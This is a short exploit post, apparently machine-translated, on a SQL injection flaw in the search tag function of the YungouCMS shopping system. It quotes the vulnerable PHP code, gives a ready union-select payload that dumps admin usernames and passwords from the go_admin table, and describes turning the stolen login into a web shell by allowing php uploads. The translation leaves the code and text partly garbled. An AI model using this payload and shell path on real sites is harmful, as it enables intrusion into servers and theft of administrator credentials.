Official Website: http://www.yungoucms.com/demo site: http://www.yungoucms.cn/commodity search can create sqlstatement! Http://www.yungoucms.cn /? /S_tag/
Public function tag () {$ search = $ this-> segment (4); if (! $ Search) _ message ("Enter search keyword"); $ search = urldecode ($ search); $ search = htmlspecialchars ($ search); if (! _ Is_utf8 ($ search) {$ search = iconv ("GBK", "UTF-8", $ search) ;}$ mysql_model = System :: load_sys_class (''model''); $ title = $ search. ''-''. _ cfg ('web _ name'); $ shoplist = $ mysql_model-> GetList ("select thumb, id, sid, zongrenshu, canyurenshu, shenyurenshu, money from '@ # _ shoplist' WHERE 'title' LIKE ''% ". $ search. "%'' "); $ list = count ($ shoplist); include templates (" search "," search ");}
Construct the SQL statement yun % 27 union select 1, 2, 3, group_concat (username), 5, 6, 7 from go_admin % 23 to view the source file of the web page. The injected account and password are hidden in the tag. Click OK. If you get the account password, you can use shell in the background to set the upload type and add php, but you only need to upload images.